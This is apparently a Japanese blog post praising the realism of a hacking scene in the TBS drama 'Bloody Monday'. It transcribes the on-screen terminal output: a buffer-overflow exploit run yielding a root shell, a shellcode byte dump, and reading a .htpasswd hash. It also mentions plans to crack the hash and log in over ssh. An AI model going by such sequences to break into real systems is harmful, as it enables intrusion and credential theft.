[雑談] * ドラマ『ブラッディ・マンデイ』 (TBS)

---

画面に一瞬だけ写った “ハッキング” シーンがなかなか良く出来ていて嬉しくなりましたｗ

textilefalcon@ws2 # python -i atk3.py web25.boucka.ru 2323 -f sc3Getting ebp offsetsaved ebp: 0xbf97ced8 ret to: 0xbf97cd84press enter to connect again　recv: 31 c8 5a eb 02 eb 0c e8 f9 ff ff ff 2f 62 69 6e 2f 73 68 5b 52 0d 4b 08 08 41 ff 09 19 0d 51 04 89 02 04 0b cd 00 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41iduid=0(root) gid=0(root) groups=0(root)cd /var/wwwls -latotal 16drwxr-xr-x 2 root toot 4096 Sep 2 19:42 .drwxr-xr-x 16 root toot 4096 Aug 25 02:30 ..-rw-r--r-- 1 root root 19 Sep 2 19:42 .htpasswd-rw-r--r-- 1 root root 48 Jul 8 21:48 index.htmlcat .htpasswdtest:46zdVar.TqDQQkill -9 $$Connection closed.>>> connkill()Stopping.. successful.>>>

exploit打って、パスワードファイル表示して、この後、brute_des でパスワードを戻して ssh で接続に行こうとしてましたｗ （なぜ、/etc/shadow じゃなくて Web のパスワード見てるんだ？とかは言わないことにしますｗ） 他にも、画像に見せかけたマルウェア（という設定）の添付ファイル付きのメールを送りつけて、VNC を立ち上げさせて遠隔操作するシーンとかもありました。 いつもは nmap のソースコードを less したりして誤魔化してるドラマが多いのに、今回は気合い入ってるなぁｗ　クレジットタイトルの「協力」のところにサイバーディフェンス研究所の名前が出てましたよ、なるほどｗ